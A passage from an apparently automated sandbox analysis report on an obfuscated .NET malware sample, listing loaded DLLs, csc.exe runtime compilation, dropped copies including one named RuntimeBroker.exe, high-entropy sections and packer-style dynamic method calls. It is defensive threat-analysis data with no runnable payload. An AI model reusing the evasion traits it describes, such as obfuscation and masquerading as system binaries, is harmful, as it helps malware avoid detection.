                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic file information: File size 2011136 > 1048576
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1ea800
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: ;C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.pdb source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.pdb source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.cs.Net Code: Type.GetTypeFromHandle(DnmyeC7ekibjx1HNibt.kumoMEJoB3D(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(DnmyeC7ekibjx1HNibt.kumoMEJoB3D(16777245)),Type.GetTypeFromHandle(DnmyeC7ekibjx1HNibt.kumoMEJoB3D(16777259))})
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeCode function: 0_2_00007FFAACC84AEF push 3506F8C1h; retf 0_2_00007FFAACC84AF6
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeCode function: 0_2_00007FFAACC827F3 push ebp; retf 0009h0_2_00007FFAACC827F4
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe0.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: RuntimeBroker.exe.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe1.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DHqWX1MX9gqbLDXcrUd.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'gtX4RMKV50v', 'e2i4y4tjFj5', 'vjhuVB4VeRh0TxPrhnBI', 'Gb2jdr4VhdledSAi0ycG', 'cEPQF44VIZAUBBXjqQod', 'uh9ydR4VsiX3yvUYBUN5'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, mfOTrCRsoQEfFnKJ8sa.csHigh entropy of concatenated method names: 'O56RdcLu5F', 'pqJI2a41EkxOwaVCl0vi', 'tWx4EK41x5RSIRNpMRA6', 'IiC1K041P5p7kEcYXdew', 'yZARQRtx04', 'LXB6Ip41WCh7TrdhSRKQ', 'dA2Qfs416hm6wrYLTKDb', 'FYdUhJ41mFNS5lUSOluA', 'Ce2cNV41vEGP3hQn93O8', 'lkxIFo4199jXdBTw5s00'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, r9vAMe2DbgIJXJRNpJm.csHigh entropy of concatenated method names: 'Ffb2IrnKuN', 'D4W2ii0KZD', 'wuP2m2WAKX', 'D0x2vcWmxP', 'Vw72Wl2SwI', 'Q4p265Ji6v', 'Id7299gYmO', 'lsy2AmXW1V', 'Dispose', 'WphmKX4kUuh9pH2yNWP7'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, OuXCHBAVvCwqNvN2gmW.csHigh entropy of concatenated method names: 'method_0', 'nNXAgNd2FA', 'vJmA1Eng5o', 'kGkAT1NQ48', 't3QANOniWc', 'MOwArMrMbU', 'qnkABDwV2s', 'h41PXj4fDk2Ld2KQ8KNO', 'hw8eLm4fePxaa7Grug8A', 'CngKTe4fhE5xY17xBU0Y'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Umkxrk6Cqo6gTqwjaYC.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'AgC6fy0J4b', 'x9J6LG1SN5', 'Dispose', 'D31', 'wNK'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DYu1jCmD6bDuaJZWsWi.csHigh entropy of concatenated method names: 'lCdW4oXEVY', 'JLqFMX4CsjwbUVa54aLQ', 'myfaBl4ChluXBrlwoUru', 'wR7fqB4CIVVsTDTP23Gl', 'uaSelq4CllaZSc935W6e', 'sc0mha4yMe', 'Hn8mII982u', 'th3msgI3Uw', 'ATnml32MQJ', 'jfomQvpGlo'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ycncuq2VJwO2UZtQwd5.csHigh entropy of concatenated method names: 'cj42gSJsJI', 'T2d21SggsP', 'kfH2T3hi9P', 'J6L2Ner36x', 'Dispose', 'IyLPCh4kjXVWFLQZIS0L', 'bvC7Li4kYwMqvnYf6UwX', 'fOSZNE4kZH3enOKwVL9k', 'IXKKDW4kDra8piIZyZbk', 'X338W94kexC0KMoYF527'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, nU0GKq7Q1U4twX3xKTZ.csHigh entropy of concatenated method names: 'kUK7PXv55J', 'PjQ78HYNHJ', 'ERd7VpWxdD', 'T2Y73PhwOo', 'JfD7gZUDgA', 'l4b71Ye4g5', 'Od07TLiVka', 'zsQ7N81LhX', 'Cxj7rgn17H', 'AG57Bv6q5l'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, zgtbUrcMZ0RTbOTMut6.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'NoZca17hpv', 'vmethod_0', 'x6ScRvXITM', 'jxh4RcwhBUA', 'YksxPI4wrdIrv6F1CCyQ', 'VUrIuq4wTIJE0j7MOgTd', 'BDaxsc4wNbuoLaJd18K6'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DYiAxPBHvVag2Z9MhIn.csHigh entropy of concatenated method names: 'H1b4R6Z9xj1', 'tEwBLFU76B', 'nKnBOMpHt2', 'G0FBqB3MJV', 'CACp4J4tQa80H8CiBDdr', 'ehmqID4tiJyMJZj4ooOH', 'fEiOOf4tdTChjmvAH8lr', 'jb4DlD4tcIwZQV36Rx3x', 'aO6gau4tmsWcwfGKhveF', 'wJxoZA4tvrN2A1EOCw2g'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y7WTRfUAt93TwyDWSgo.csHigh entropy of concatenated method names: 'fPPUpBOouw', 'mR7UCZA8To', 'KFoUHZXA8H', 'RXCkcS4PBu38Aifmpo45', 'Gx2Cor4PGChcESb6jljm', 'KJKYaI4PN0jqC9ic3iaw', 'OSrgeG4PrCegtrlR7ylc', 'yNGUxo3Fp0', 'sK9UP7dgrQ', 'x0rU8jG8MH'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ICyeT0dq7FpH3EYhMDb.csHigh entropy of concatenated method names: 'MWS4Rs99kYJ', 'U0HdKaaQjZ', 'X514RlF0F9h', 'mCn1Uy4wQsPF5t5lLaPf', 'eDZgwm4wi1fDRis7S0T8', 'zhKsVX4wsC5607aay1jf', 'bO8upB4wloAtcbIOTvWy', 'W0hRHA4wd9NVTAvJwX97', 'kfN6K94wcZgLY3P52uvb', 'p8X02E4wmDcUhlI7j2jr'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pQ5PKEoMV2tcIbg4VEr.csHigh entropy of concatenated method names: 'TkkoajyUQl', 'RnroRTHXqB', 'L9foXqaDnm', 'CsDoYLHLC7', 's9Cn2w4xRiLIbycjVsK6', 'ylD7694x0e0UAZmhFGjr', 'GyndHb4xa98CmLOl3mHm', 'U86Mw94xXT0aBbHkYkhr', 'WiQSBh4xYUkQDxUPOgqs', 'znpVsp4xZgYtvApaEMdI'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pg8KmFaiYN5Es4mA9ES.csHigh entropy of concatenated method names: 'r1waxNGKW2', 'oHSrdf4gNe0DEvUcRAtM', 'uET6xH4gruHqMVbqvk1x', 'cDv8nK4gBJ8pCIkRlUvl', 'xZkU914gGmKJVgqTRRJc', 'XZP2bo4g5DkdA37Qw5RX', 'fXGacji7h2', 'hm5amcJqxX', 'cTLavgmOB6', 'Y8faWda2X3'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, cR7E6wixWfruYQNdOY7.csHigh entropy of concatenated method names: 'sh8iNu8RaX', 'Mh91584GuBeGjTCT45So', 'Q1WVOg4GnZvyAEQS2nK1', 'TWnexM4GtDFuBIFAKHvv', 'OKDVs84G2mdFevoWxY4f', 'Q7gi83FycV', 'N7QiVD85Fq', 'myQi3pY5CJ', 't0i9te4Gqs0v7Ec34q0o', 'qGyoAG4GLWJy2ryiusWj'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, TRj9fr4SEcQ7yWtOFXZ.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'RYm4R4igkpi', 'e2i4y4tjFj5', 'oqQfAj4Et9skVdDlRGEq', 'uRw0lr4Eu4QVrBP2LFhY', 'wh6L7E4E2g6ElM9bkplW', 'Si935f4EJ3mNdpw52UKv'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, uRC4MOgTgtZEa4KnvfP.csHigh entropy of concatenated method names: 'Close', 'qL6', 'R1mgrRI2Tc', 'hvjgBdYogC', 'OMmgGwItFs', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, YThpP9cIA1DqXqBfCjN.csHigh entropy of concatenated method names: 'Gvil9I4pa7O5vO64Dd4b', 'KJjHlJ4pRVx76HjI6AcG', 'o6XY2n4pXsg9OYEL6WEk', 'GHbRys4pMeSodfBqibXT', 'GZ5Dkt4p0dFhSPv4jL5d', 'method_0', 'method_1', 'JDfcljAueO', 'Gn8cQqrRN2', 'OmLci0C4TU'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y1AZWLy32GcvXc2sKqd.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'z7R4Ryu2367', 'e2i4y4tjFj5', 'j6Jv1T48PwaNvVSchaOY', 'clKDOi488VibBTi9mhkF', 'ga67aM48Vob06YguLn3y', 'EeUv9v483Y7qnleeykAI', 'FB4J0Y48gCBbXOqcyXQi'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, OeJjJC4twrVfAxiG4A6.csHigh entropy of concatenated method names: 'P9X', 'a9T42tlJ2t', 'M4O4RbAcqQI', 'imethod_0', 'JOl4JVKZwb', 'TBT5fI4EOgrwEp7Mi9Yo', 'tBuvpb4EfCanhHW47fwQ', 'QTtOxW4ELURB1V843dXh', 'b3ef514EqpkqClylm1SD', 'I3ehVb4EFj1OgbBpIBvQ'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, LilhZhVkTtTcbDx5Gxb.csHigh entropy of concatenated method names: 'WP3VS05VQe', 'zrCVzJCPLL', 'pV13bI4DHt', 'FTZ34pTlHl', 'Qw13oHjOUB', 'spW3U1O0sc', 'Rpx', 'method_4', 'f6W', 'uL1'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, h23FhTMIa0Kf0qwyLTy.csHigh entropy of concatenated method names: 'JJuMEClHNL', 'cvAMxWd20J', 'cV7MPRM6yx', 'r71GpM4VT588FqQvscKB', 'llp2qd4VNfqDy5gUAm1t', 'YPXGik4VgSMfs4fhsJrd', 'VAW0L64V1WLwEI45aYXa', 'Et0MWEqmow', 'hwPM6q1xRU', 'Fs6Ep24V8K19BFlTjtcT'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, a2QWd4deZSv6jHvoqUS.csHigh entropy of concatenated method names: 'oKEddA9CYW', 'kQ5Fhd45fHQVpNIpFaZ3', 'tVjCxc45LX53nTtEyXFh', 'mIPUhJ45CCINMM2tnose', 'oxmRyQ45HkHKQD1XAVa6', 'J9g1nL45OKB7rphvO8ty', 'toadIAM6ly', 'OkgX7C45r1eDaqLMQUpq', 'xyxxRo45T1h3jJHvhTFr', 'JmrKCF45NRCNSBi2jKth'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, UvZaqqaXLeftAx16lpl.csHigh entropy of concatenated method names: 'x0LaZU9UiH', 'K9qaj051Hp', 'ToLcXk4gDGgtb5tO4dTS', 'R5b5up4gZfdsN8Dao5Sj', 'SCaem24gjYZrXtTINUMq', 'vb2Bjt4geNPCWgVyIq3a', 'EZ7WUu4ghtNIeGhJ5VUQ', 'v1U7fg4gIXns7gmbReS4', 'Am96UT4gsmFjtST0aoHD', 'SPQVML4gl8XM8vIis5uA'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, W5lolZGJ9rraSRUy8Kq.csHigh entropy of concatenated method names: 'ppoG7R5Xqf', 'FluGSPbyQu', 'OLUGzNxC82', 'CLA5bkulOZ', 'pII54tu3hD', 'zsf5o09XEd', 'fVA5U5HxCk', 'E8k5yW1rQ1', 'zWa5M4Qv9c', 'WYI50WQueW'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, xYdACC7G1nI42GSlcNV.csHigh entropy of concatenated method names: 'nmA403JFDko', 'VOl40gr6PMi', 'h4c401cOrsO', 'xQw40TLiP2w', 'jnp40Na9bWo', 'Hxi40rXMUGE', 'xWA40BFAkTg', 'ukkSMFpR7V', 'OAw40GlXxXW', 'r5N405OJjPT'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, hHAK4hoFqEn0ZG3umO9.csHigh entropy of concatenated method names: 'hqCUaUqC52', 'oAeVMr4xn3TWtJncqEhq', 'JyXmOb4xtJTROGyc4Oh7', 'WqcMZT4xu9kSGGgjFtD7', 'WtVXkQ4x2Plp9W7iO965', 'XgO5vC4xFwPmAd0q9lMk', 'v1JGR04xK84JIGtSb43i', 'UGJST84xJKvlImA6LpC3', 'JOOjcx4xkMpMeCdOemc5', 'q4OUboIu5f'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, hx02alMKuc6rw2H1lMp.csHigh entropy of concatenated method names: 'vykMkAQT9p', 'OlGM7A5QTf', 't9yMSwTbcM', 'IcLMzmM1V9', 'Vik0bnpKUC', 'i4Q04MVJrn', 'qah0oaT5hR', 'e87D0743ZPRuvyCBruip', 'cby2U043jeMcf2iRq7Qm', 'T3UkZe43XBI3t0KdeQuT'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, tuHYGwP5QOuUUGKYdl9.csHigh entropy of concatenated method names: 'FWXPpYdsVF', 'iANPCokEG8', 'WfHPH53qM6', 'ty1PfuITev', 'rCQPLXR1ff', 'StePOx5Qjj', 'OXOPq9QWFg', 'PpnPF1x12m', 'z2dPKRGt0s', 'Nv5PncoV6t'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pJZAdchv6iucSg0IgON.csHigh entropy of concatenated method names: 'ihEiDxHrdo', 'hQLieRFRTA', 'mypVd74GV38G428qYtLi', 'rHvs4t4GPMDXfL16QaUF', 'aQKh1Q4G8QMCuvDsWiqE', 'vfVGJx4G3auEl30Z6imm', 'J73iQU4GgpGXCQvZQM35', 'lBhiimpJWG', 'CkRnai4GrtR003V6ni0n', 'LBbnlB4GTZlfX7O95hHw'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, hhH2kfa41p1RK5mKhwA.csHigh entropy of concatenated method names: 'xDpaUfChKb', 'Qj7ayJPvi7', 'HljaMBWXaZ', 'RiOS6c4gyKie6lYeHoOx', 'FrOIkf4goFjUlXA1iQT3', 'PqIGOk4gU1gsmVWsUaHA', 'foD2q54gM8ageeD4dmnM', 'srZ47j4g0mvL4IooNuW4', 'xwpAvA4gaJoJ3P9hWsao', 'WrMVGe4gR4Oddt8V4sby'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ct8JiX9WdC7BriZe3sD.csHigh entropy of concatenated method names: 'FnD999ikW0', 'Lno9APIlV8', 'VOl9EwyCqc', 'HTD9xTEhaN', 'FmW9PbvEGi', 'h91kIa4HwD0mjUBUARaB', 'XEabQ14HpkqvaRtSNfhx', 'NyXUt74HCrGqncQS2FSb', 'WSg5qc4HHPN83EuARWuM', 'BAQX3c4Hfx5VYUdBIMNx'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, HJcR64XeVlp4Gqe46r9.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'tqsiLj4TPOjPttvZg7FI', 'tQuLuZ4T8fxiS7K2SfuC', 'jH6bMT4TVxE1r3ovi25A', 'QaiXI2oWk6'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, CSTOxBWYpawGbl83390.csHigh entropy of concatenated method names: 'uoTWVk3tCe', 'zQwWj9rVC4', 'J5PWDP3Rs5', 'H2gWeVSGOG', 'YNeWhoVIWs', 'e5PWIkWbHn', 'DsnWs590tJ', 'RVkWl9f04Z', 'fXiWQhlfC1', 'YFZWisNyFF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, RJr2tURYI0Xfy3KxpIw.csHigh entropy of concatenated method names: 'WFIRjIFGBX', 'n0wRDWMHKy', 'eUgReZXkTP', 'g8X6p841sr2jiUKfDGgd', 't9CblC41lixP31xiUcWb', 'Bf83Uj41hjdve3wrKqbG', 'z03qI241IJMXMeVMMe0C', 'WtKnxX41QYANauNm908F', 'YGGHfp41i0Wi52jcTcGy', 'WgOZNf41d4Gtxh2DgXJm'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pZLv76aV1IdZCZRATxB.csHigh entropy of concatenated method names: 'yEWagRsMrk', 'o7Oa1e9Z1C', 'rK6EJZ4gHcGyWpZfNPgm', 'RyjwsU4gptvWepjruhkn', 'd0IhCA4gC9UFxM6iyYtH', 'KhW0304gf5JE1QeSXjfw', 'WdmiTR4gLXDF6HSYocBA', 'MGctUV4gOhZplSX7dKv5', 'vtCPhh4gqtYKh6PlOk2v'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, SuSVZey9tV57fBRHKKj.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'tto4RU5GbcX', 'e2i4y4tjFj5', 'dRbeHR48votUdkbjUHDB', 'U6c19k48WjHoAMRDNJuG', 'fy4pSP486bDuoseGj0LF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, nIDB2DodYZJnuXZ0WuE.csHigh entropy of concatenated method names: 'uXZomMvhlc', 'wnvovNmJaf', 'iGNPwK4xdA24wu78QQMu', 'GWFL654xQn2X5U81MM6Z', 's6tN3t4xiSEcqw6URlKL', 'UQFvGN4xcHw3TEvbhTSD', 'HJXYjU4xm3rTVOL94pcW', 's5YRL14xvf1CVvX8L4RG'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, YTM1eOawj8WhaLbGhkT.csHigh entropy of concatenated method names: 'rZta2YfL33', 'Ws2aJfmmaZ', 'FQIQRH41UVkpuvirPF0F', 'PxFaFW414USh3LsXDMFm', 'kSyrfn41oxnVUFPk06Xk', 'rAfwa041ysXaUEuvhjVN', 'x6paCT5B7E', 'v6HaHYTQnb', 'rISafm0O8A', 'P2vaLUpPL5'
